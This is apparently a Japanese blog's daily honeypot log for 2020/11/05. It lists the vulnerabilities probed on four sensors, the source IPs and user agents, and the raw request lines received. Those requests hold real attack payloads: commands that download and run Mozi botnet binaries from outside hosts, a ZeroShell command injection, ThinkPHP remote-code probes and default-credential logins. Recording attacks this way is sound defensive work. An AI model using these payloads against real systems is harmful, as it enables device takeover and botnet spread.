2020/11/05 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2020/11/05分です。

特徴

Location：JP

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//42[.]235[.]185[.]202:44432/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：US

GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
ApiToolによるスキャン行為
zgrabによるスキャン行為
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。

Location：UK

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.sqlへのスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
を確認しました。

Location：SG

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//125[.]47[.]12[.]244:33269/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：43 (前日比：+12)
US：総アクセス数：53 (前日比：-84)
UK：総アクセス数：108 (前日比：+82)
SG：総アクセス数：39 (前日比：-5)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	42.235.185.202	China
2	45.81.32.97	Germany
1	60.191.125.35	China
1	61.219.11.153	Taiwan
1	62.210.144.217	France
2	80.82.65.80	Netherlands
9	91.241.19.84	Russia
10	121.196.181.53	China
1	149.129.50.37	Singapore
1	157.230.214.161	United States
1	161.35.167.219	United States
1	162.243.128.226	United States
1	168.119.37.144	Germany
4	169.45.99.50	United States
1	172.105.206.155	United States
1	180.188.247.114	India
3	185.239.242.117	Netherlands
1	192.241.234.246	United States
1	209.97.175.235	United States

UserAgent一覧

件数	UserAgent
3	-
1	Go-http-client/1.1
1	Hello, world
4	Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
1	Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; NetCaptor 6.5.0RC1)
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
9	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
3	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
3	Mozilla/5.0 zgrab/0.x
2	curl/7.58.0

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
5	GET	/.env	HTTP/1.1
2	GET	/050XNFeuojFKn6rs/index.php	HTTP/1.1
2	GET	/1zz7	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
4	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
2	GET	/settings.php	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//42[.]235[.]185[.]202:44432/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/v2/public/get-instruments	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//www[.]proxylists[.]net/proxyjudge.php	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	HEAD	http[:]//112[.]124[.]42[.]80:63435/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	8.9.36.10	United States
6	47.94.136.241	China
1	61.219.11.153	Taiwan
4	71.6.167.142	United States
2	80.82.65.80	Netherlands
1	85.96.179.77	Turkey
9	91.241.19.84	Russia
7	103.141.104.10	Indonesia
1	115.48.130.168	China
1	147.158.166.19	Malaysia
1	162.243.128.227	United States
3	163.172.159.134	United Kingdom
2	169.45.99.50	United States
6	185.132.1.52	Ukraine
2	185.239.242.117	Netherlands
1	188.161.29.63	Palestine
1	192.241.224.183	United States
3	212.47.244.68	France
1	219.157.29.56	China

UserAgent一覧

件数	UserAgent
18	-
1	ApiTool
2	Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2; rv:56.0.1) Gecko/20100101 Firefox/56.0.1
9	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.52
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	Mozilla/5.0 zgrab/0.x
6	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
2	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
1	GET	/.env	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
2	GET	/1zz7	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
2	GET	/boaform/admin/formLogin?username=adminisp&psd=adminisp	HTTP/1.0
1	GET	/boaform/admin/formLogin?username=ec8&psd=ec8	HTTP/1.0
7	GET	/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22	HTTP/1.0
3	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/myadmin/scripts/setup.php	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/vicidial/admin.php?ADD=140000000000	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
2	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/editBlackAndWhiteList	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//berthasmith[.]website/79f42e0756fed0c173c09e54b09649a569d1943f952c4cc300ea1b7daac411ad6bd4b563ba13981b39fa42842d2db3b9c398e89c9825dabd10559083cab134a30719ebcf1ddf3cb3ac91693a5a5dc8c30ba6e651708fdbff4a201f2010493c8d	HTTP/1.1
1	POST	http[:]//zabieraj[.]fun/1c2300c08ed178c2cfc19a91a261215348cb42b9d5daaa873967ef7803b4995169fc35548eccede073978b359ddd9a072d68d3add560c43f4b13fed5dbfe0490459441d5ce6cfe87ad0b92a9808bbf5f048e15019b4bb2712e008684ee761bfc	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
9	45.156.26.88	Russia
1	60.191.125.35	China
1	61.219.11.153	Taiwan
2	80.82.65.80	Netherlands
1	91.193.5.58	Australia
9	91.241.19.84	Russia
1	115.48.202.196	China
1	125.43.73.160	China
4	169.45.99.50	United States
1	172.104.242.173	United States
1	172.105.89.161	United States
72	185.153.196.226	Russia
2	185.239.242.117	Netherlands
1	192.241.239.234	United States
1	212.33.198.51	Iran
1	219.154.101.243	China

UserAgent一覧

件数	UserAgent
8	-
4	Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
18	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
72	Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)
1	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
2		-
1		27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$	HTTP/1.0
2	GET	/050XNFeuojFKn6rs/index.php	HTTP/1.1
1	GET	/0bef	HTTP/1.0
2	GET	/1zz7	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/backup/order.sql	HTTP/1.1
1	GET	/backup/orders.sql	HTTP/1.1
1	GET	/backup/payment.sql	HTTP/1.1
1	GET	/backup/payments.sql	HTTP/1.1
1	GET	/backup/shop.sql	HTTP/1.1
1	GET	/backup/store.sql	HTTP/1.1
1	GET	/backups/order.sql	HTTP/1.1
1	GET	/backups/orders.sql	HTTP/1.1
1	GET	/backups/payment.sql	HTTP/1.1
1	GET	/backups/payments.sql	HTTP/1.1
1	GET	/backups/shop.sql	HTTP/1.1
1	GET	/backups/store.sql	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=adminisp&psd=adminisp	HTTP/1.0
1	GET	/cKYU	HTTP/1.1
1	GET	/card.sql	HTTP/1.1
1	GET	/cards.sql	HTTP/1.1
3	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/credit_card.sql	HTTP/1.1
1	GET	/credit_cards.sql	HTTP/1.1
1	GET	/creditcard.sql	HTTP/1.1
1	GET	/creditcards.sql	HTTP/1.1
1	GET	/database/order.sql	HTTP/1.1
1	GET	/database/orders.sql	HTTP/1.1
1	GET	/database/payment.sql	HTTP/1.1
1	GET	/database/payments.sql	HTTP/1.1
1	GET	/database/shop.sql	HTTP/1.1
1	GET	/database/store.sql	HTTP/1.1
1	GET	/db/order.sql	HTTP/1.1
1	GET	/db/orders.sql	HTTP/1.1
1	GET	/db/payment.sql	HTTP/1.1
1	GET	/db/payments.sql	HTTP/1.1
1	GET	/db/shop.sql	HTTP/1.1
1	GET	/db/store.sql	HTTP/1.1
1	GET	/dbbackup/order.sql	HTTP/1.1
1	GET	/dbbackup/orders.sql	HTTP/1.1
1	GET	/dbbackup/payment.sql	HTTP/1.1
1	GET	/dbbackup/payments.sql	HTTP/1.1
1	GET	/dbbackup/shop.sql	HTTP/1.1
1	GET	/dbbackup/store.sql	HTTP/1.1
1	GET	/dump/order.sql	HTTP/1.1
1	GET	/dump/orders.sql	HTTP/1.1
1	GET	/dump/payment.sql	HTTP/1.1
1	GET	/dump/payments.sql	HTTP/1.1
1	GET	/dump/shop.sql	HTTP/1.1
1	GET	/dump/store.sql	HTTP/1.1
1	GET	/dumps/order.sql	HTTP/1.1
1	GET	/dumps/orders.sql	HTTP/1.1
1	GET	/dumps/payment.sql	HTTP/1.1
1	GET	/dumps/payments.sql	HTTP/1.1
1	GET	/dumps/shop.sql	HTTP/1.1
1	GET	/dumps/store.sql	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/mysql/order.sql	HTTP/1.1
1	GET	/mysql/orders.sql	HTTP/1.1
1	GET	/mysql/payment.sql	HTTP/1.1
1	GET	/mysql/payments.sql	HTTP/1.1
1	GET	/mysql/shop.sql	HTTP/1.1
1	GET	/mysql/store.sql	HTTP/1.1
1	GET	/mysql_backup/order.sql	HTTP/1.1
1	GET	/mysql_backup/orders.sql	HTTP/1.1
1	GET	/mysql_backup/payment.sql	HTTP/1.1
1	GET	/mysql_backup/payments.sql	HTTP/1.1
1	GET	/mysql_backup/shop.sql	HTTP/1.1
1	GET	/mysql_backup/store.sql	HTTP/1.1
1	GET	/order.sql	HTTP/1.1
1	GET	/orders.sql	HTTP/1.1
1	GET	/payment.sql	HTTP/1.1
1	GET	/payments.sql	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/shop.sql	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/sql/order.sql	HTTP/1.1
1	GET	/sql/orders.sql	HTTP/1.1
1	GET	/sql/payment.sql	HTTP/1.1
1	GET	/sql/payments.sql	HTTP/1.1
1	GET	/sql/shop.sql	HTTP/1.1
1	GET	/sql/store.sql	HTTP/1.1
1	GET	/store.sql	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	HEAD	http[:]//112[.]124[.]42[.]80:63435/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.236.55.221	United States
1	27.35.107.66	South Korea
1	42.233.67.63	China
1	60.191.125.35	China
1	61.219.11.153	Taiwan
1	64.31.8.10	United States
1	66.240.205.34	United States
4	71.6.199.23	United States
1	80.82.65.80	Netherlands
1	91.193.5.58	Australia
9	91.241.19.84	Russia
2	94.102.59.7	Netherlands
1	125.47.12.244	China
6	169.45.99.50	United States
1	172.105.89.161	United States
2	185.239.242.117	Netherlands
1	192.241.204.61	United States
1	192.241.217.52	United States
1	209.97.175.235	United States
2	209.141.33.215	United States

UserAgent一覧

件数	UserAgent
9	-
1	Hello, world
6	Mozilla Firefox Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
9	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
4	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	Mozilla/5.0 zgrab/0.x
2	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
1		Gh0st\xad
4	GET	/.env	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
2	GET	/050XNFeuojFKn6rs/index.php	HTTP/1.1
1	GET	/0bef	HTTP/1.0
2	GET	/1zz7	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/CrST	HTTP/1.1
2	GET	/api/4	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=ec8&psd=ec8	HTTP/1.0
3	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//42[.]233[.]67[.]63:49903/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//125[.]47[.]12[.]244:33269/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	HEAD	http[:]//112[.]124[.]42[.]80:63435/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1